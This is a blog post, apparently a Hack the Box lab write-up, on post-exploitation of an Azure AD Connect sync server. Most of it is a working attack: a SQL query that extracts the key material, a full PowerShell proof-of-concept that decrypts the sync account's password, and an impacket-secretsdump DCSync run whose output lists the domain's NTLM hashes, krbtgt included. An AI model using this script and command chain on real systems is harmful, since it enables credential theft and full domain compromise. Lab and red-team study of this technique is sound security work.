Azure AD Connect Post Exploitation for DCSync

Penentration Test Leave a comment

I want to share some experience of penetration testing on Hack the box. I am not going to give you a walkthrough about the box, but I would share some knowledge I got related to Azure AD Connect

I am going to explain more on the post exploitation and escalation process after you get low level account

The attack that we are going to achieve in this post-exploitation is to get the account of the synchronizer that created during the agent installation because it has the capabilities to replicate data from your on-premises Active Directory (MSOL_05062a06af04)

Azure AD Connect is a synchronizer of on premisses active directory and cloud active directory that by having this will enable you to either synch your password or pass the cloud authentication to your internal AD. Below is the overview architecture

We understand that from the above architecture AD Connect will use MS-SQL database for its process such as processing metadata and configuration data

Enumeration

As usual, after we got the shell on the box what need to do further is to enumerate the information of the box. I usually use tools to help me on the enumeration is by using winPEAS or Seatbelt.

WinPEAS Result

Seatbelt Result

Based on the above information that we can see that this machine is used as ADSynch server.

The Attack

In order to decrypt the data, We need to firstly retrieve the 3 important keys from the datasebase to allow us to decrypt the data. InstanceID, KeyID, Entropy

We can retrieve the above three items by using this below command 

*Evil-WinRM* PS C:\Users\Administrator\Documents> sqlcmd -Q "use ADSync; select instance_id,keyset_id,entropy from mms_server_configuration"
Changed database context to 'ADSync'.
instance_id                          keyset_id   entropy
------------------------------------ ----------- ------------------------------------
1852B527-DD4F-4ECF-B541-EFCCBFF29E31           1 194EC2FC-F186-46CF-B44D-071EB61F49CD

I get the POC script from https://blog.xpnsec.com/azuread-connect-for-redteam/ in order to suite my pentest box to become like below.

function Get-Pass {
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$key_id = 1
$instance_id = [GUID]"1852B527-DD4F-4ECF-B541-EFCCBFF29E31"
$entropy = [GUID]"194EC2FC-F186-46CF-B44D-071EB61F49CD"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=MONTEVERDE;Database=ADSync;Trusted_Connection=true"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
}

After we run the powershell in the box then we can decrypt the password for this 

*Evil-WinRM* PS C:\Users\Administrator\Documents> hack2.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Pass
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@**********!
*Evil-WinRM* PS C:\Users\Administrator\Documents>

So with that account is being compromissed then you can basically do further attack which is dumping the NTDS.dit of the AD for futher action

root@net-dragon:~/box/monteverde# impacket-secretsdump -just-dc-ntlm monteverde.local/administrator@10.10.10.172
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff:::
AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06:::
MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6:::
MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1:::
MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea:::
MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3:::
MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6:::
MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736:::
MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8:::
MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388:::
MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:011a5c84028cd80fbd9023c6986e378b:::
[*] Cleaning up...

Leave a Reply